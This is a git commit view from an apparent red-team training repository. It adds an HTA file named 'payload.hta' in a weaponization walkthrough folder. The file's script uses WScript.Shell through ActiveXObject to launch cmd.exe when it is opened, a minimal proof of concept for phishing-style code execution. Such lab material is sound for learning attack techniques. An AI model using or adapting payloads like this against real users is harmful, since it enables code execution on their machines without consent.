initial commit
This commit is contained in:
8
Walkthroughs/RedTeaming/Weaponization/payload.hta
Normal file
8
Walkthroughs/RedTeaming/Weaponization/payload.hta
Normal file
@@ -0,0 +1,8 @@
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
var c= "cmd.exe"
|
||||
new ActiveXObject('WScript.Shell').Run(c);
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
Reference in New Issue
Block a user